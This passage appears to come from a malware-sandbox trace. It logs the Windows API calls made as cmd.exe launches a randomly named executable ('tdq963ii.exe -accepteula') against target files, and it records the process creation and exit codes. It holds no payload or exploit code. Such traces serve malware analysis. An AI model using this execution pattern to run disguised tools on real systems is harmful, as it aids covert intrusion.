lpcbData=0x2eee38*=0x1000 | out: lpType=0x2eee3c*=0x0, lpData=0x2eee40*=0x9, lpcbData=0x2eee38*=0x1000) returned 0x2 [0168.140] RegCloseKey (hKey=0x68) returned 0x0 [0168.140] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e2c5 [0168.140] srand (_Seed=0x5f51e2c5) [0168.140] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"executed_florists.exe\" -nobanner" [0168.140] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"executed_florists.exe\" -nobanner" [0168.141] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0168.141] GetProcessHeap () returned 0x650000 [0168.141] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x210) returned 0x664500 [0168.142] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x664508, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0168.142] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0168.142] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0168.142] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0168.142] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.142] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.143] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0168.143] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0168.143] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0168.143] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0168.143] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0168.143] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0168.143] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0168.143] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0168.143] GetProcessHeap () returned 0x650000 [0168.143] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x54) returned 0x664718 [0168.143] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2efc00 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0168.144] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2efc00, lpFilePart=0x2efbfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2efbfc*="Desktop") returned 0x25 [0168.144] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0168.144] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef97c | out: lpFindFileData=0x2ef97c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6620a0 [0168.145] FindClose (in: hFindFile=0x6620a0 | out: hFindFile=0x6620a0) returned 1 [0168.145] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ef97c | out: lpFindFileData=0x2ef97c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x6620a0 [0168.145] FindClose (in: hFindFile=0x6620a0 | out: hFindFile=0x6620a0) returned 1 [0168.145] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0168.145] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ef97c | out: lpFindFileData=0x2ef97c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6620a0 [0168.146] FindClose (in: hFindFile=0x6620a0 | out: hFindFile=0x6620a0) returned 1 [0168.146] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0168.146] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0168.146] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0168.146] GetProcessHeap () returned 0x650000 [0168.146] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x662dc0 | out: hHeap=0x650000) returned 1 [0168.146] GetEnvironmentStringsW () returned 0x662220* [0168.147] GetProcessHeap () returned 0x650000 [0168.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb92) returned 0x662dc0 [0168.147] FreeEnvironmentStringsW (penv=0x662220) returned 1 [0168.147] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0168.147] GetProcessHeap () returned 0x650000 [0168.147] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664718 | out: hHeap=0x650000) returned 1 [0168.147] GetProcessHeap () returned 0x650000 [0168.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x400e) returned 0x664f78 [0168.148] GetProcessHeap () returned 0x650000 [0168.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x82) returned 0x662220 [0168.149] GetProcessHeap () returned 0x650000 [0168.149] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664f78 | out: hHeap=0x650000) returned 1 [0168.149] GetConsoleOutputCP () returned 0x1b5 [0169.018] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0169.018] GetUserDefaultLCID () returned 0x409 [0169.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0169.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efd40, cchData=128 | out: lpLCData="0") returned 2 [0169.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efd40, cchData=128 | out: lpLCData="0") returned 2 [0169.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efd40, cchData=128 | out: lpLCData="1") returned 2 [0169.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0169.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0169.019] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0169.020] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0169.020] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0169.020] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0169.020] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0169.020] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0169.020] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0169.020] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0169.020] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0169.022] GetProcessHeap () returned 0x650000 [0169.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20c) returned 0x6622b0 [0169.022] GetConsoleTitleW (in: lpConsoleTitle=0x6622b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0169.022] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0169.023] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0169.023] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0169.023] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0169.025] GetProcessHeap () returned 0x650000 [0169.025] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x400a) returned 0x664f78 [0169.025] GetProcessHeap () returned 0x650000 [0169.025] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x664f78 | out: hHeap=0x650000) returned 1 [0169.028] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0169.028] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0169.028] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0169.028] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0169.029] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0169.029] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0169.029] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0169.029] GetProcessHeap () returned 0x650000 [0169.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x58) returned 0x664718 [0169.029] GetProcessHeap () returned 0x650000 [0169.029] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x22) returned 0x6624c8 [0169.033] GetProcessHeap () returned 0x650000 [0169.033] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x66) returned 0x6624f8 [0169.035] GetConsoleTitleW (in: lpConsoleTitle=0x2efa38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0169.037] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0169.037] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0169.037] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0169.037] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0169.037] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0169.037] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0169.037] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0169.037] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0169.037] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0169.038] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0169.038] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0169.038] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0169.038] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0169.038] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0169.038] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0169.038] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0169.038] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0169.038] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0169.038] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0169.038] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0169.038] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0169.039] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0169.039] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0169.039] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0169.039] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0169.039] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0169.039] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0169.039] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0169.039] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0169.040] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0169.040] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0169.040] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0169.040] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0169.040] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0169.040] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0169.040] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0169.040] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0169.040] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0169.040] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0169.040] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0169.040] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0169.041] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0169.041] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0169.041] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0169.041] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0169.041] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0169.041] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0169.041] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0169.041] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0169.041] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0169.041] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0169.041] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0169.042] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0169.042] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0169.042] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0169.042] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0169.042] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0169.042] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0169.042] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0169.042] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0169.042] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0169.042] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0169.042] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0169.043] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0169.043] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0169.043] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0169.043] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0169.043] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0169.043] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0169.043] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0169.043] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0169.043] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0169.043] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0169.043] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0169.044] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0169.044] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0169.044] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0169.044] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0169.044] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0169.044] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0169.044] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0169.044] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0169.044] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0169.044] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0169.044] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0169.045] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0169.045] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0169.045] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0169.047] GetProcessHeap () returned 0x650000 [0169.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x210) returned 0x662568 [0169.047] GetProcessHeap () returned 0x650000 [0169.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x80) returned 0x662780 [0169.048] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0169.049] GetProcessHeap () returned 0x650000 [0169.049] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x418) returned 0x662808 [0169.049] SetErrorMode (uMode=0x0) returned 0x0 [0169.049] SetErrorMode (uMode=0x1) returned 0x0 [0169.050] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x662810, lpFilePart=0x2ef558 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef558*="Desktop") returned 0x25 [0169.050] SetErrorMode (uMode=0x0) returned 0x1 [0169.050] GetProcessHeap () returned 0x650000 [0169.050] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x662808, Size=0x6e) returned 0x662808 [0169.050] GetProcessHeap () returned 0x650000 [0169.050] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x662808) returned 0x6e [0169.050] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0169.050] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0169.050] GetProcessHeap () returned 0x650000 [0169.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x120) returned 0x662880 [0169.051] GetProcessHeap () returned 0x650000 [0169.051] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x238) returned 0x6629a8 [0170.304] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0170.305] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x2ef2f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef2f4) returned 0x662b58 [0170.305] GetProcessHeap () returned 0x650000 [0170.305] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x662b98 [0170.305] FindClose (in: hFindFile=0x662b58 | out: hFindFile=0x662b58) returned 1 [0170.306] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0170.306] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0170.306] GetConsoleTitleW (in: lpConsoleTitle=0x2ef7cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0170.306] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef654, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef71c | out: lpAttributeList=0x2ef654, lpSize=0x2ef71c) returned 1 [0170.306] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef654, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef654, lpPreviousValue=0x0) returned 1 [0170.306] GetStartupInfoW (in: lpStartupInfo=0x2ef610 | out: lpStartupInfo=0x2ef610*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x80, hStdError=0xb)) [0170.307] lstrcmpW (lpString1="\\tdq963ii.exe", lpString2="\\XCOPY.EXE") returned -1 [0170.308] CreateProcessW (in: lpApplicationName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", lpCommandLine="tdq963ii.exe -accepteula \"executed_florists.exe\" -nobanner", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2ef6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"executed_florists.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef6fc | out: lpCommandLine="tdq963ii.exe -accepteula \"executed_florists.exe\" -nobanner", lpProcessInformation=0x2ef6fc*(hProcess=0x78, hThread=0x74, dwProcessId=0xaec, dwThreadId=0x224)) returned 1 [0170.334] CloseHandle (hObject=0x74) returned 1 [0170.335] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0170.335] GetProcessHeap () returned 0x650000 [0170.335] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x662dc0 | out: hHeap=0x650000) returned 1 [0170.335] GetEnvironmentStringsW () returned 0x662bb8* [0170.335] GetProcessHeap () returned 0x650000 [0170.335] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb92) returned 0x667528 [0170.335] FreeEnvironmentStringsW (penv=0x662bb8) returned 1 [0170.335] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0179.865] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x2ef5f0 | out: lpExitCode=0x2ef5f0*=0x1) returned 1 [0179.866] CloseHandle (hObject=0x78) returned 1 [0179.866] _vsnwprintf (in: _Buffer=0x2ef738, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef5fc | out: _Buffer="00000001") returned 8 [0179.866] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0179.866] GetProcessHeap () returned 0x650000 [0179.866] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x667528 | out: hHeap=0x650000) returned 1 [0179.866] GetEnvironmentStringsW () returned 0x662bb8* [0179.866] GetProcessHeap () returned 0x650000 [0179.866] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb92) returned 0x667528 [0179.866] FreeEnvironmentStringsW (penv=0x662bb8) returned 1 [0179.866] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0179.866] GetProcessHeap () returned 0x650000 [0179.866] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x667528 | out: hHeap=0x650000) returned 1 [0179.866] GetEnvironmentStringsW () returned 0x662bb8* [0179.866] GetProcessHeap () returned 0x650000 [0179.866] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xb92) returned 0x667528 [0179.866] FreeEnvironmentStringsW (penv=0x662bb8) returned 1 [0179.866] GetProcessHeap () returned 0x650000 [0179.866] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x660100 | out: hHeap=0x650000) returned 1 [0179.866] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef654 | out: lpAttributeList=0x2ef654) [0179.866] _get_osfhandle (_FileHandle=1) returned 0x80 [0179.866] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0179.867] _get_osfhandle (_FileHandle=1) returned 0x80 [0179.867] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0179.867] _get_osfhandle (_FileHandle=0) returned 0x3 [0179.867] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0179.867] SetConsoleInputExeNameW () returned 0x1 [0179.867] GetConsoleOutputCP () returned 0x1b5 [0179.867] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0179.867] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.868] exit (_Code=1) Process: id = "159" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x328aa000" os_pid = "0x5e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "135" os_parent_pid = "0xb10" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"blank.jtp\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 670 os_tid = 0xb04 [0168.199] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fb34 | out: lpSystemTimeAsFileTime=0x28fb34*(dwLowDateTime=0x1e32b5e0, dwHighDateTime=0x1d68287)) [0168.200] GetCurrentProcessId () returned 0x5e4 [0168.200] GetCurrentThreadId () returned 0xb04 [0168.200] GetTickCount () returned 0x1156fb4 [0168.200] QueryPerformanceCounter (in: 